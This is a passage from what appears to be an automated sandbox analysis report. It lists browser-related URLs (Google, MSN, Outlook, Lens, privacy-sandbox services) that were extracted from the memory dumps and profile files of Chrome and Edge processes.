    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.m
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1k
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2j
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4k
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5i
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5m
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8m
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9j
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;k
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?m
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Bn
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/In
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ln
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sn
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Vn
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ai
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gn
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jn
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409836818.0000080800694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
    Source: chrome.exe, 00000010.00000003.3409836818.0000080800694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000003.3409836818.0000080800694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
    Source: chrome.exe, 00000010.00000003.3409836818.0000080800694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
    Source: chrome.exe, 00000010.00000003.3451060984.00004EB401A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451118818.00004EB401A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3410063215.00000808006F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451027049.00004EB401A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451091498.00004EB401A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
    Source: msedge.exe, 00000013.00000002.3650228583.000027F0025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
    Source: 79HDJ5.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
    Source: chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
    Source: chrome.exe, 00000010.00000003.3450598830.00004EB4019C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
    Source: chrome.exe, 00000010.00000003.3450598830.00004EB4019C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardN
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
    Source: chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
    Source: chrome.exe, 00000010.00000003.3473204332.00004EB40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3472297843.00004EB40195C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
    Source: chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
    Source: chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
    Source: chrome.exe, 00000010.00000003.3410106379.00000808006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
    Source: chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450397730.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://m.kugou.com/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://m.soundcloud.com/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://m.vk.com/
    Source: chrome.exe, 00000010.00000003.3473204332.00004EB40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3472297843.00004EB40195C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
    Source: chrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
    Source: msedge.exe, 00000013.00000002.3650228583.000027F0025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
    Source: msedge.exe, 00000013.00000002.3650228583.000027F0025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
    Source: Cookies.22.drString found in binary or memory: https://msn.comXID/
    Source: Cookies.22.drString found in binary or memory: https://msn.comXIDv10
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://music.amazon.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://music.apple.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://music.yandex.com
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
    Source: chrome.exe, 00000010.00000003.3420458404.00004EB40103C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
    Source: 000003.log6.21.dr, 2cc80dabc69f58b6_0.21.drString found in binary or memory: https://ntp.msn.com
    Source: 000003.log2.21.drString found in binary or memory: https://ntp.msn.com/
    Source: QuotaManager.21.drString found in binary or memory: https://ntp.msn.com/_default
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
    Source: Session_13377747733943714.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
    Source: QuotaManager.21.dr, QuotaManager-journal.21.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
    Source: QuotaManager.21.dr, QuotaManager-journal.21.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default/
    Source: 2cc80dabc69f58b6_0.21.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
    Source: msedge.exe, 00000013.00000002.3650228583.000027F0025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
    Source: chrome.exe, 00000010.00000003.3472616348.00004EB400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19044659
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://open.spotify.com
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000010.00000003.3417307336.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/0/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/0/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
    Source: msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
    Source: chrome.exe, 00000010.00000003.3420458404.00004EB40103C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
    Source: chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
    Source: chrome.exe, 00000010.00000003.3420458404.00004EB40103C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://sb.scorecardresearch.com/
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://srtb.msn.cn/
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://srtb.msn.com/
